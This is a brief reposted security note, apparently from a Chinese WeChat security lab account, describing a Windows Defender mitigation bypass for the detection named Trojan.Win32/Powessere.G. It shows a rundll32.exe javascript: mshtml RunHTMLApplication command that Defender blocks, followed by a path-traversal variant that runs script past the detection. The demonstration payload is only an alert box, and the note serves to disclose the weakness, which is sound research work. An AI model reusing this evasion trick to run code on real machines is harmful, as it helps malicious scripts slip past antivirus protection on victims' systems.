C:sec>rundll32.exe javascript:”….mshtml,,RunHTMLApplication “;alert(13)
Access is denied.
C:sec>rundll32.exe javascript:”\..\..\mshtml\..\..\mshtml,RunHTMLApplication “;alert(‘新年快乐!’)
原文始发于微信公众号(Khan安全攻防实验室):Windows Defender Trojan.Win32/Powessere.G / Mitigation Bypass